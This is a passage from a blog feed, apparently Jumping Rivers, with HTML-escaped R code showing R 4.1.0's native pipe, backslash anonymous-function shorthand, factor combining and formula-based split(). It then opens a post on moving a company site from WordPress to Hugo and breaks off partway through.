&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5: Is the string &amp;#34;at&amp;#34; found in any of the animals?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dogs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cats&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rats&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;at&amp;#34;&lt;/span&gt;, .)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] FALSE TRUE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;No place holder is provided with the native pipe. To achieve the same
result using the native pipe, you would need to define a function. This
can be done explicitly with a predefined function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;find_at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;at&amp;#34;&lt;/span&gt;, x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dogs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cats&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rats&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;find_at&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] FALSE TRUE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;… or implicitly using an in-place function definition:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0: make sure you remember the parentheses on the RHS!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dogs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cats&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rats&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;at&amp;#34;&lt;/span&gt;, x)}()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] FALSE TRUE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="shorthand-syntax-for-anonymous-functions"&gt;Shorthand syntax for anonymous functions&lt;/h2&gt;
&lt;p&gt;Functions are typically defined in R using the syntax&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;do_something &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(parameters) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The function that results can be used as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;do_something&lt;/span&gt;(args)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Functions may also be defined anonymously, and this is common practice
when using higher-order functions such as those in the {purrr} package
(&lt;code&gt;map()&lt;/code&gt;, &lt;code&gt;reduce()&lt;/code&gt;, &lt;code&gt;keep()&lt;/code&gt;; and their base-R counterparts: &lt;code&gt;Map()&lt;/code&gt;,
&lt;code&gt;lapply()&lt;/code&gt; etc).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# For each letter,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - find the name of each dataset in the {datasets} package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# that starts with that letter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Using {tidyverse} syntax&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ds &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:datasets&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ds[stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_starts&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tolower&lt;/span&gt;(ds), x)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[[1]]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;ability.cov&amp;#34; &amp;#34;airmiles&amp;#34; &amp;#34;AirPassengers&amp;#34; &amp;#34;airquality&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[5] &amp;#34;anscombe&amp;#34; &amp;#34;attenu&amp;#34; &amp;#34;attitude&amp;#34; &amp;#34;austres&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[[2]]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;beaver1&amp;#34; &amp;#34;beaver2&amp;#34; &amp;#34;BJsales&amp;#34; &amp;#34;BJsales.lead&amp;#34; &amp;#34;BOD&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[[3]]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;cars&amp;#34; &amp;#34;ChickWeight&amp;#34; &amp;#34;chickwts&amp;#34; &amp;#34;co2&amp;#34; &amp;#34;CO2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[6] &amp;#34;crimtab&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In base R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Map&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;^&amp;#34;&lt;/span&gt;, x) &lt;span style="color:#8b949e;font-style:italic"&gt;# eg &amp;#34;^a&amp;#34; to match a leading &amp;#39;a&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grep&lt;/span&gt;(pattern, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:datasets&amp;#34;&lt;/span&gt;), value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, ignore.case &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this setting the &lt;code&gt;function(x) {...}&lt;/code&gt; syntax can look rather verbose,
especially when chaining together several functions into a pipeline. A
new syntax has been introduced into R that may make these anonymous
function declarations more succinct:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Map&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;\&lt;/span&gt;(x) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;^&amp;#34;&lt;/span&gt;, x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grep&lt;/span&gt;(pattern, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:datasets&amp;#34;&lt;/span&gt;), value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, ignore.case &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this syntax, the final example in the native-pipe section (above)
could be rewritten in this manner:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dogs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cats&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rats&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {&lt;span style="color:#d2a8ff;font-weight:bold"&gt;\&lt;/span&gt;(x) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;at&amp;#34;&lt;/span&gt;, x)}()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="minor-changes"&gt;Minor changes&lt;/h2&gt;
&lt;h3 id="combining-factors"&gt;Combining factors&lt;/h3&gt;
&lt;p&gt;In earlier versions of R, if two factors were combined together using
&lt;code&gt;c(factor1, factor2)&lt;/code&gt;, the result was an integer vector:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5: Combining factors with different levels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;b&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] 1 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5: Combining factors with identical levels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] 1 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This happens because factors are stored internally as integers. In R &amp;gt;=
4.1, the results are a little more sensible. Combining two factors
together:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;generates a new factor,&lt;/li&gt;
&lt;li&gt;with levels that are a combination of the levels in the original
factors.&lt;/li&gt;
&lt;/ul&gt;
&lt;!-- end list --&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fac1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;d&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fac2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;c&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(fac1, fac2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] a b d b c&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Levels: a b d c&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that this is consistent with how &lt;code&gt;forcats::fct_c()&lt;/code&gt; combines
factors together.&lt;/p&gt;
&lt;h3 id="splitting-data-frames-using-formula-syntax"&gt;Splitting data-frames using formula syntax&lt;/h3&gt;
&lt;p&gt;A nice shorthand has been introduced for splitting data-frames that uses
formula syntax. To do this, you originally had to duplicate the name of
the data-frame in the call to &lt;code&gt;split()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5: Separate the car models in &amp;#39;mtcars&amp;#39; by their number of gears&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;split&lt;/span&gt;(mtcars, mtcars&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;gear)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When used in a {magrittr} pipeline, that syntax looks rather clunky:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Get the car-model with the highest &amp;#39;mpg&amp;#39; for cars with 3, 4, 5 gears separately&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;split&lt;/span&gt;(., .$gear) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lapply&lt;/span&gt;(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) x&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[which.max&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mpg), ])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Combining the new pipeline syntax and the function shorthand together
with the new syntax for &lt;code&gt;split&lt;/code&gt;, the latter can be rewritten as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;split&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; gear) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lapply&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;\&lt;/span&gt;(x) x&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[which.max&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mpg), ])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Tips &amp; tricks when moving to Hugo</title><link>https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/</link><pubDate>Mon, 29 Mar 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Over Christmas we moved our &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;main site&lt;/a&gt;
from Wordpress to Hugo &amp;amp; Netlify. The main benefits for us moving to
&lt;a href="https://gohugo.io/" rel="external"&gt;Hugo&lt;/a&gt; were&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Security. We were always getting emails about various Wordpress
plugins. As our site was essentially static, this was an additional
maintenance task.&lt;/li&gt;
&lt;li&gt;Site-speed. Although Wordpress has lots of clever plugins for
optimising site-speed (which then leads to the situation above);
Wordpress is just “big”.&lt;/li&gt;
&lt;li&gt;Raw cost. By this I mean web-site fees. This wasn’t actually a
driver for us. The Hugo site is certainly cheaper and we save
~£1,000 per year. But for a commercial site, this cost is dwarfed
by the next point.&lt;/li&gt;
&lt;li&gt;Time: Everything took longer with Wordpress. Our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training
courses&lt;/a&gt; are
all located in GitLab. So updating our Wordpress site would involve
copying and pasting. This either took a significant amount of time
or simply wasn’t done. Either situation wasn’t great.&lt;/li&gt;
&lt;li&gt;More time: As we didn’t use Wordpress on a day-to-day basis, there
was also an overhead of trying to remember what to do.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s worth pointing out, that Hugo isn’t always better than Wordpress.
